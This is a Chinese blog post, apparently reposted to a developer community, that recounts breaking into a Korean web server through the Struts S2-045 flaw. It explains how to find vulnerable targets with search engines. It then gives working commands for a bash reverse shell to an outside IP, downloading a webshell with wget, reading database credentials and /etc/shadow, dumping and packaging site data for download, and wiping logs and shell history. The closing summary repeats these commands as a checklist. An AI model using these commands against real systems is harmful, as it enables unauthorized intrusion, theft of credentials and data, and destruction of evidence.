开发者社区> 科技小能手> 正文

利用Strutss02-045漏洞快速渗透韩国某服务器

简介:
+关注继续查看

Byantian365.com  simeon

Struts s02-045漏洞非常火爆,国内好多网站均是采用这种架构,下面就如何快速获取Linux服务器的权限进行分析和分享,在文章结尾部分高度浓缩渗透linux技巧和方法总结,欢迎大家拍砖!

1.获取URL地址

可以通过百度、zoomeyehttps://www.zoomeye.org/)和shadonhttps://www.shodan.io/)进行搜索,我目前整理了一些关键词:

enterprise.action

register.action

info.action

login.action

index.action

2.存在漏洞检测

还可以根据国家进行收集例如site:kr这是韩国网站你懂的收集到地址后直接在团队小伙伴修改的程序中进行检测如图1所示显示该网站存在漏洞。如果显示不是“Its vulnerable s2_045”则表明该网站已经修护或者不存在漏洞,就果断放弃吧!

                            wKioL1jEtEzxS05RAABMuH1eU2M694.jpg-wh_50

1检测漏洞是否存在

3.获取网站真实物理路径

  获取网站真实路径可以通过locatefindwhereis三个命令来实现,locate命令,前提是前期执行过updatedb命令,如果没有执行则直接执行updatedb命令后再执行。例如“locate *.jsp”可以获取所有的jsp文件名称和路径,如图2所示,会将所有的jsp文件给检索出来。

wKioL1jEtEzwUwa3AAC01IVJ_Qc518.jpg-wh_50

2使用locate命令检索jsp文件

有时候网站的jsp程序太多也无法快速定位,笔者摸索出来一个技巧,就是通过查看网站的独立文件,例如打开网页中的图片等文件,获取其名称后,再通过“locate prd01.jpg”命令来检索,会提高效率,如图3所示,直接减少到4条记录,通过跟网站对比。命令执行结果中可以判断网站正式路径就在下面两个中:

/home/root/ROOT_20160524/resource/images/kor/main/prd01.jpg

/home/root/ROOT_20160923/resource/images/eng/main/prd01.jpg

wKiom1jEtE2SqD4lAACCMHhPFqI492.jpg-wh_50

3使用locate检索图片文件

4.果断反弹shell

   使用bash -i >&/dev/tcp/59.110.xx.xxx/4433 0>&1或者/usr/bin/bash-i >& /dev/tcp/59.110.xx.xxx/4433 0>&1命令执行反弹,反弹IP地址59.110.xx.xxx,端口为4433,注意该IP是独立IP,且能监听4433端口。如图4所示。

wKiom1jEtE2hty10AABU7VgNMLU213.jpg-wh_50

4反弹到shell执行

5.下载Webshell到服务器

   使用命令“wgetO/home/root/ROOT_20160524/resource/images/a.jsphttp://218.1.xx.xx/tklama/1.txt”下载1.txt到目录“/home/root/ROOT_20160524/resource/images”并保存为a.jsp文件,如图5所示。

wKioL1jEtE2yWgUWAADSoQzR6KA975.jpg-wh_50

 

5下载Webshell到服务器

6.获取webshell

    在浏览器中访问http://203.xxx.xxx.xxx:8080/resource/images/a.jsp,如图6所示,顺利成功获取webshell

wKiom1jEtE6yRWeaAADLWdd267g173.jpg-wh_50

6获取Webshell

7.获取网站数据库配置信息

   网站数据库配置信息一般在WEB-INF/classes/db.properties,如图7所示,可以获取该网站所使用的数据库oracle的账号以及密码等信息,后续动作就不展开讨论了。

wKioL1jEtE7DqTFSAABt6iMZwKU150.jpg-wh_50

7获取数据库密码信息

8.渗透总结

1)使用关键字获取urlurl中一定要带有action,例如index.action,收集到的关键字:

enterprise.action

register.action

info.action

login.action

index.action

(2)搜索引擎

杜娘:http://www.baidu.com

zoomeye:https://www.zoomeye.org/

shodan :https://www.shodan.io/

google镜像:https://google.tse.moe/ https://g.hancel.net/

3)反弹监听服务器命令

bash -i>& /dev/tcp/59.110.xx.xxx/4433 0>&1

/usr/bin/bash -i >& /dev/tcp/59.110.xx.xxx/4433 0>&1

4)定位物理真实路径

 locate *.jsp locate logo.jpg

需要寻找网站独立的图片文件,js文件等。

5)下载并保持webshell

wget –O/home/site/antian365.com.jsp  http://218.1.xx.xxx/tklama/1.txt

6)获取密码哈希值

 cat /etc/shadow

7)查看数据库信息

locatedb.properties

locatejdbc*

locateWEB-INF

8)命令行下连接数据库

whereis Mysql

Mysql –hlocalhost–uroot –ppassword

9mysqldump –hlocalhost–uroot –ppassword somedb>somedb.sql

somedb数据导出为somedb.sql

10)压缩文件

tar –zcvfsomedb.tar.gz somedb.sql

/home/www目录下的所有文件打包到tmp目录

tar –zcvf  /tmp/somedb.tar.gz  /home/www/

移动somedb.tar.gz到站点目录/home/www/下:

mv/tmp/somedb.tar.gz /home/www/somedb.tar.gz

下载文件:

http://www.antian365.com/somedb.tar.gz

下载完毕删除文件,切记别乱删除文件。rm –rf文件名,是彻底删除某个文件

rm –rf/home/www/somedb.tar.gz

11)清除日志

rm -rf/var/log/access.log

rm -rf/var/log/wtmp

rm -rf/var/log/lastlog

rm -rf/var/log/secure*

rm -rf/root/.bash_history

rm -rf/root/.mysql_history

history –c

 

 欢迎加入安天365安全技术交流群(51383306)进行技术讨论,无关人员勿进!



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/1905542

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
105 0
【web渗透思路】敏感信息泄露(网站+用户+服务器)
【web渗透思路】敏感信息泄露(网站+用户+服务器)
71 0
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
170 0
新型 Linux 僵尸网络变种“EnemyBot”现身!利用 Web 服务器、Android 及 CMS 漏洞进行攻击
新型 Linux 僵尸网络变种“EnemyBot”现身!利用 Web 服务器、Android 及 CMS 漏洞进行攻击
122 0
NukeSped“后门”重现!朝鲜黑客组织 Lazarus 利用 Log4j 漏洞攻击 VMware Horizon 服务器
NukeSped“后门”重现!朝鲜黑客组织 Lazarus 利用 Log4j 漏洞攻击 VMware Horizon 服务器
206 0
APP数据被泄露接到境外电话 该怎么查服务器漏洞
上海经济7月份开始陆续恢复,一些在上海做APP项目的客户开始了一系列的营销推广和发展,在众多渠道推广下,用户下载安装APP的同时,一些安全上的漏洞频发,并被高级黑客给盯上,具体的数据泄露攻击的症状为:用户刚注册好的用户信息就被泄露,不一会就会收到电话推广营销,并且有些用户的数据被恶意篡改,导致APP运营平台损失较大,比如一些用户借贷额度被篡改成20w的额度,APP项目方发现问题后立即找了APP安全应急响应服务团队进行了全面的安全应急响应服务,要求尽快找出漏洞问题的原因以及攻击进行溯源。
190 0
Web服务器(中间件)漏洞
Web服务器又叫Web中间件,常见的Web中间件有 IIS Apache Nginx
95 0
apache漏洞 导致服务器被入侵的详情与漏洞修复
apache最近爆出的漏洞越来越多,旗下的solr产品存在远程服务器执行恶意代码漏洞,该漏洞产生的主要原因是因为apache dataimporthandler数据外部收集的一个端口模块,该模块支持从远程的地址进行通信,并多数据进行收集,正因为开放了远程地址,可导致攻击者构造恶意的代码对DIH进行脚本注入,从而让后端服务器对恶意代码进行了执行,该漏洞可导致服务器被攻击,被入侵,关于该漏洞的详情我们SINE安全技术深入的带大家来分析:
404 0
PublicCMS 网站漏洞 任意文件写入并可提权服务器权限
PublicCMS是目前网站系统中第一个采用JAVA架构 TOMCAT+Apcche+Mysql数据库架构的CMS网站,开源,数据承载量大,可以承载到上千万的数据量,以及用户的网站并发可达到上千万的PV,PublicCMS静态全站html,访问速度极快,模板样式多,可自己设计,第三方的API接口也很多,深受网站运营者的喜欢。最重要的是开源,免费升级,支持动静分离,数据库及时备份等功能。
405 0
我如何发现Facebook服务器中的远程代码执行漏洞
大家好!首先我做一下自我介绍。我叫Reginaldo Silva,是一名巴西籍的计算机工程师。最近我的工作与信息安全有关,尤其是在Web应用程序安全性的方面。如果可以的话,我很乐意给大家演示如何入侵网站和应用程序。我的主页上有一些相关信息,欢迎大家浏览。
122 0
+关注
科技小能手
文章
问答
视频
文章排行榜
最热
最新
相关电子书
更多
函数计算事件驱动的无服务器计算服务
立即下载
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载